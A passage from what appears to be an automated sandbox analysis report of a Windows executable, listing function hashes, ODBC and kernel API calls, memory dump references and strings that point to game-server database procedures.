                                                                                      • Opcode ID: 1b6cc161325da4aa121a3fb086e8e267d7ee0f25cb21da504d9144f82a1865a2
                                                                                      • Instruction ID: 26fea907ec5affd95d79a7a9a21d20c4fc7697e36fb20aa9c6bd0a665dec353a
                                                                                      • Opcode Fuzzy Hash: 1b6cc161325da4aa121a3fb086e8e267d7ee0f25cb21da504d9144f82a1865a2
                                                                                      • Instruction Fuzzy Hash: 184161B1900248EFCF04CF59DC91AAEB7B5FB44314F14862EE9259B392D738A905CB98
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044910E
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044913E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044916E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044919E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004491CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7a650891ccdcced9ce561dcea5d34310a17bcbe137de3958b21c77c3a87d662
                                                                                      • Instruction ID: 7ceb4fc6f78f180f3c0eae3141ba13dc8f720c095a6b013c8823f0d2a82b9384
                                                                                      • Opcode Fuzzy Hash: a7a650891ccdcced9ce561dcea5d34310a17bcbe137de3958b21c77c3a87d662
                                                                                      • Instruction Fuzzy Hash: 4031CCB5A00118ABDB24DB09CD51FEA7379EB44718F1082CAFE187B3C5D671AD908F94
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000), ref: 0044B30F
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000FA,?,00000000,00000000), ref: 0044B33F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000FA,?), ref: 0044B36F
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044B39F
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?), ref: 0044B3CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a32ef0b2109c936e0f3857cbd148bb70f11e9f72926e263d3bda13afc71e473a
                                                                                      • Instruction ID: a9d8d12a1994ff6622c912437bb8a9bbb6a89885c7f5070588eb74acc65b2a3b
                                                                                      • Opcode Fuzzy Hash: a32ef0b2109c936e0f3857cbd148bb70f11e9f72926e263d3bda13afc71e473a
                                                                                      • Instruction Fuzzy Hash: FF312F70A84518ABEF64CB29CC59FAA7335EF44708F1082C8F65C6B391DA716D808F54
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044CA2D
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044CA5D
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044CA8D
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044CABD
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044CAED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a4d30faa7e26e41d8eef0697ed4698cfd5f863b49317452a5468ce040cc4023
                                                                                      • Instruction ID: b6f1ba5df7fa8915a9aaccaf1ace3dfc0bd6a1c2db1494cee34997639e95795a
                                                                                      • Opcode Fuzzy Hash: 3a4d30faa7e26e41d8eef0697ed4698cfd5f863b49317452a5468ce040cc4023
                                                                                      • Instruction Fuzzy Hash: 10314FB0980158ABDB60CB48CC45FAE7339EB40718F2083C8F65C6A3D2DA31AD808F5C
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(?,?,?,?,0046D11C), ref: 00464072
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,0046D11C), ref: 00464081
                                                                                      • SetEvent.KERNEL32(?,?,?,?,0046D11C), ref: 004640B8
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,0046D11C), ref: 004640C7
                                                                                      • SetEvent.KERNEL32(?,?,?,?,0046D11C), ref: 004640F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Event$ObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 2127046782-0
                                                                                      • Opcode ID: 2ae32b62f4d60bd5409284580fa53ea32f39c16753c541f8d92a6025b2675fdb
                                                                                      • Instruction ID: c024f50ed836af1c88e3d2764ee8787f13783799da0bd281812773494eb751e8
                                                                                      • Opcode Fuzzy Hash: 2ae32b62f4d60bd5409284580fa53ea32f39c16753c541f8d92a6025b2675fdb
                                                                                      • Instruction Fuzzy Hash: BF2162352442124BDE256B7DA850A6AA3E49FC6378730072EB6B5C32D5EE1CD84347AB
                                                                                      Strings
                                                                                      • HeapValidate = %d, xrefs: 004609D5
                                                                                      • Memory::_realloc(%d) failed : size=%d, key=%#x, total=%d, phys=%d, virtual=%d, xrefs: 004609BA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HeapValidate = %d$Memory::_realloc(%d) failed : size=%d, key=%#x, total=%d, phys=%d, virtual=%d
                                                                                      • API String ID: 0-4119759555
                                                                                      • Opcode ID: d0ae28522203fd53e096f58d272cdcf31b3666408cf6e8124f4d1f5a84af9326
                                                                                      • Instruction ID: d9a92f7e93865c290e1bd929d9995e4029098351186b9599c6067e65092ec4ce
                                                                                      • Opcode Fuzzy Hash: d0ae28522203fd53e096f58d272cdcf31b3666408cf6e8124f4d1f5a84af9326
                                                                                      • Instruction Fuzzy Hash: 6B21B9B2A002086FD704DFADEC46EAF77ADEB85315F0445AAFC08D7212E635D91487E5
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                      • API String ID: 3519838083-1866435925
                                                                                      • Opcode ID: 762d9a343b0dd11b9a593bb681057aef70da9acf215fd8cdb166aedf510db087
                                                                                      • Instruction ID: e07e479e226e2d1951e4d0cad4ccf438c499b741faf02d565db09d8158ffc0e6
                                                                                      • Opcode Fuzzy Hash: 762d9a343b0dd11b9a593bb681057aef70da9acf215fd8cdb166aedf510db087
                                                                                      • Instruction Fuzzy Hash: 981189B194060CAACF14DFE0C9A2FDDBB74AB51308F6440AFA10567352D7BD5E09DB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetIndunRankerMemberList] (?)},000000FD), ref: 0043B641
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043B680
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043B6B8
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetIndunRankerMemberList] (?)}, xrefs: 0043B638
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetIndunRankerMemberList] (?)}
                                                                                      • API String ID: 0-2000685906
                                                                                      • Opcode ID: 8b2808c5a6ed0f66eeffb33d983ec12da3e9befb2ebb2fd66a963400cb94a129
                                                                                      • Instruction ID: e46ba3d549125bdf920519fe95dbbe6a6cde52f0a0ef97de8166738d079f7d24
                                                                                      • Opcode Fuzzy Hash: 8b2808c5a6ed0f66eeffb33d983ec12da3e9befb2ebb2fd66a963400cb94a129
                                                                                      • Instruction Fuzzy Hash: 991151B1A8425AABDB208F04CD51FB97334EB84714F2585D8F6243B7C5CAB169808B48
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DestroySiegeBuilding] (?)},000000FD), ref: 0043118D
